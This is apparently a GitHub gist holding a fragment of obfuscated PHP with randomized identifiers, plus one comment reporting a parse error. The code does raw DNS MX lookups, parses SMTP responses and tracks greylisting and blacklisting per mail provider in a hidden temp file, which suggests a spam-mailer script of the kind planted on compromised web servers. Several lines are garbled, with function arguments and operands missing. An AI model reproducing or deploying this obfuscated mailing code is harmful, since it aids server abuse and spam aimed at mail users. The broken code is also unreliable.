'sec' => $lvfwb5,
'usec' => 0
));
@socket_set_option($uwtpi87, SOL_SOCKET, SO_SNDTIMEO, array(
'sec' => $lvfwb5,
'usec' => 0
));
}
else {
@stream_set_timeout($uwtpi87, $lvfwb5);
}
return TRUE;
}
function kymrg16($u11, $ttgac24, $kuknm3)
{
$rpfsm11 = 0;
$ftcug81 = "";
$uwtpi87 = avcbc52($u11, FALSE, constant('SOCKET_PROTO_UDP') , '8.8.8.8', 53, 10, $rpfsm11, $ftcug81);
if (!$uwtpi87) {
return FALSE;
}
$qtxhy15 = rand(0x0001, 0xFFFE);
$twrqf75 = explode(, $ttgac24);
$fflyc27 = pack('nnnnnn', $qtxhy15, 0x0100, 0x0001, 0x0000, 0x0000, 0x0000);
foreach($twrqf75 as $mmcxs32) {
$fflyc27.= pack('Ca*', strlen($mmcxs32) , $mmcxs32);
}
$fflyc27.= pack('Cnn', 0x00, $kuknm3, 0x0001);
$thfyk26 = nmavu24($u11, $uwtpi87, $fflyc27, $rpfsm11, $ftcug81);
if (!$thfyk26 || $thfyk26 != strlen($fflyc27)) {
dgsvq12($u11, $uwtpi87);
return FALSE;
}
$rtgfd32 = mzezd77($u11, $uwtpi87, 4086, $rpfsm11, $ftcug81);
if ($rtgfd32 == FALSE || strlen($rtgfd32) < 12) {
dgsvq12($u11, $uwtpi87);
return FALSE;
}
$vhslt56 = unpack('ntid/nflags/nque/nans/nauth/nadd', substr($rtgfd32, 0, 12));
$zuozd44 = 12;
$oghrj40 = array(
'header' => $vhslt56
);
for ($mrkfo51 = constant('DNS_STEP_QESTION'); $mrkfo51 <= constant('DNS_STEP_ADDITIONAL'); $mrkfo51++) {
$jctmx81 = '';
switch ($mrkfo51) {
case constant('DNS_STEP_QESTION'):
$jctmx81 = 'que';
break;
case constant('DNS_STEP_ANSWER'):
$jctmx81 = 'ans';
break;
case constant('DNS_STEP_AUTHORITY'):
$jctmx81 = 'auth';
break;
case constant('DNS_STEP_ADDITIONAL'):
$jctmx81 = 'add';
break;
}
for ($fxzub70 = 0; $fxzub70 < $vhslt56[$jctmx81]; $fxzub70++) {
$fwcdh66['name'] = xgrgh71($u11, $zuozd44, $rtgfd32);
if ($mrkfo51 == constant('DNS_STEP_QESTION')) {
$fwcdh66 = array_merge($fwcdh66, unpack('ntype/nclass', substr($rtgfd32, $zuozd44, 4)));
$zuozd44+= 4;
}
else {
$fwcdh66 = array_merge($fwcdh66, unpack('ntype/nclass/Nttl/ndatalength', substr($rtgfd32, $zuozd44, 10)));
$zuozd44+= 10;
switch ($fwcdh66['type']) {
case constant('DNS_TYPE_MX'):
$fwcdh66 = array_merge($fwcdh66, unpack('npreference', substr($rtgfd32, $zuozd44, 2)));
$zuozd44+= 2;
$fwcdh66['data'] = xgrgh71($u11, $zuozd44, $rtgfd32);
break;
case constant('DNS_TYPE_A'):
$fwcdh66 = array_merge($fwcdh66, unpack('Ndata', substr($rtgfd32, $zuozd44, 4)));
$zuozd44+= 4;
$fwcdh66['ip'] = long2ip($fwcdh66['data']);
break;
case constant('DNS_TYPE_NS'):
case constant('DNS_TYPE_PTR'):
$fwcdh66['data'] = xgrgh71($u11, $zuozd44, $rtgfd32);
break;
default:
$zuozd44+= $fwcdh66['datalength'];
}
}
$oghrj40[$jctmx81][] = $fwcdh66;
}
}
return $oghrj40;
}
function xgrgh71($u11, &$ybxcn68, $rtgfd32)
{
$oghrj40 = "";
$bryxm64 = $ybxcn68;
while (ord($rtgfd32[$bryxm64]) != 0) {
if (ord($rtgfd32[$bryxm64]) == 0xC0) {
if ($bryxm64 >= $ybxcn68) {
$ybxcn68+= 2;
}
$bryxm64 = ord($rtgfd32[$bryxm64 + 1]);
continue;
}
if (strlen($oghrj40) > 0) {
$oghrj40.=;
}
$oghrj40.= substr($rtgfd32, $bryxm64 + 1, ord($rtgfd32[$bryxm64]));
$bryxm64+= ord($rtgfd32[$bryxm64]) + 1;
if ($bryxm64 > $ybxcn68) {
$ybxcn68 = $bryxm64;
}
}
if ($bryxm64 >= $ybxcn68) {
$ybxcn68+= 1;
}
return $oghrj40;
}
function lqpzi27($u11, $myott53)
{
$oghrj40 = array();
$qplzq81 = oipnm51($u11, 1);
$kptlu46 = xfshv62($u11, $qplzq81) . 'session_a029.tmp';
if (!file_exists($kptlu46)) {
return $oghrj40;
}
$ojqon20 = fopen($kptlu46, 'r');
$kdrkm37 = "";
if ($ojqon20) {
while ($tyklg86 = fgets($ojqon20)) {
$kdrkm37.= $tyklg86;
}
fclose($ojqon20);
$ihmej6 = nhraz16($u11, $kdrkm37);
$ljbpv40 = json_decode($ihmej6, TRUE);
if (is_array($ljbpv40)) {
$oghrj40 = array_filter($ljbpv40, create_function('$x', 'return (time(NULL) < $x); '));
}
}
return $oghrj40;
}
function ksqbs71($u11, $siytz64)
{
$qplzq81 = oipnm51($u11, 1);
$kptlu46 = xfshv62($u11, $qplzq81) . 'session_a029.tmp';
if (file_exists($kptlu46)) {
unlink($kptlu46);
}
$ojqon20 = fopen($kptlu46, 'w');
if ($ojqon20) {
$kdrkm37 = dcydj64($u11, json_encode($siytz64, TRUE));
fwrite($ojqon20, $kdrkm37);
fclose($ojqon20);
}
return;
}
function fbflb66($u11, $enizl83, $wxfxn29, &$siytz64)
{
$zebob65 = $xedap26 = $yohad14 = "";
if (!dhowq55($u11, $wxfxn29['s_datain'], $zebob65, $xedap26, $yohad14)) {
return "";
}
foreach($enizl83 as $ydtuc6 => $zdrlc63) {
if (preg_match('/' . preg_quote($ydtuc6) . '$/', $wxfxn29['s_mxhost'])) {
if (!empty($zdrlc63[$wxfxn29['s_step']])) {
foreach($zdrlc63[$wxfxn29['s_step']] as $vtqdz50 => $pyazj91) {
foreach($pyazj91 as $dodjd43) {
if (is_array($dodjd43)) {
if (!empty($dodjd43[0]) && $dodjd43[0] != $zebob65) {
continue;
}
if (!empty($dodjd43[1]) && $dodjd43[1] != $xedap26) {
continue;
}
if (!empty($dodjd43[2]) && !preg_match('/' . $dodjd43[2] . '/', $yohad14)) {
continue;
}
}
else {
if (!preg_match('/' . $dodjd43 . '/', $yohad14)) {
continue;
}
}
if ($vtqdz50 == 'gl') {
$siytz64[$ydtuc6] = time(NULL) + 7200;
}
if ($vtqdz50 == 'bl') {
$siytz64[$ydtuc6] = time(NULL) + 86400;
}
return '(' . $vtqdz50 . ')';
}
}
}
}
}
return "";
}
function dhowq55($u11, $bcbri95, &$zebob65, &$xedap26, &$npuqq41)
{
$swihb19 = array();
if (!preg_match('/^([0-9]{3})[ -]([0-9]+\.[0-9]+\.[0-9]+[ -])?(.*)/', $bcbri95, $swihb19)) {
return FALSE;
}
if (empty($swihb19[2])) {
$swihb19[2] = '0.0.0';
}
if (count($swihb19) != 4) {
return FALSE;
}
$sbjct44 = preg_replace('/[a-zA-Z\-0-9\.]+[a-zA-Z]\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\]/', ' zzhip ', $swihb19[3]);
$nfmhg36 = preg_replace('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', ' zzip ', $sbjct44);
$ygfry59 = preg_replace('/[A-Za-z0-9\-\.\_]+\@[A-Za-z0-9\-\.]+/', ' zzmal ', $nfmhg36);
$xtbyn89 = preg_replace('/[45][0-9][0-9]\s/', '', $ygfry59);
$bxevx27 = preg_replace('/[^A-Za-z0-9]/', ' ', $xtbyn89);
$ioclc49 = preg_replace('/\s+/', ' ', strtolower($bxevx27));
$zebob65 = trim($swihb19[1], ' ');
$xedap26 = trim($swihb19[2], ' ');
$npuqq41 = trim($ioclc49, ' ');
return TRUE;
}
function oipnm51($u11, $myott53)
{
if (function_exists('sys_get_temp_dir')) {
return sys_get_temp_dir();
}
foreach(array(
'TMP',
'TEMP',
'TMPDIR'
) as $dnydp89) {
$yhhvg6 = getenv($dnydp89);
if ($yhhvg6) {
return $yhhvg6;
}
}
$yhhvg6 = tempnam(__FILE__, '');
if (file_exists($yhhvg6)) {
unlink($yhhvg6);
return dirname($yhhvg6);
}
return FALSE;
}
function xfshv62($u11, $wbhde23)
{
$oghrj40 = preg_replace('/\\/', '/', $wbhde23);
if ($oghrj40[strlen($oghrj40) - 1] != '/') {
$oghrj40.= '/';
}
return $oghrj40;
}
function zfuri16($u11, $enizl83, $wxfxn29)
{
foreach($enizl83 as $ydtuc6 => $zdrlc63) {
if (preg_match('/' . preg_quote($ydtuc6) . '$/', $wxfxn29['s_mxhost'])) {
return $ydtuc6;
}
}
return FALSE;
}
@joaqhoc
Copy link

joaqhoc commented Apr 26, 2017

( ! ) Parse error: syntax error, unexpected ',' in www\www.php on line 948

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment